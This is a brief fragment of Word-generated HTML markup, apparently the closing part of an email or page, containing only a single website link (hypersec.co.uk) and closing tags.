<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>http://www.hypersec.co.uk<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span lang=EN-GB style='font-size:
10.0pt;font-family:Arial'><o:p> </o:p></span></font></p>
</div>
</body>
</html>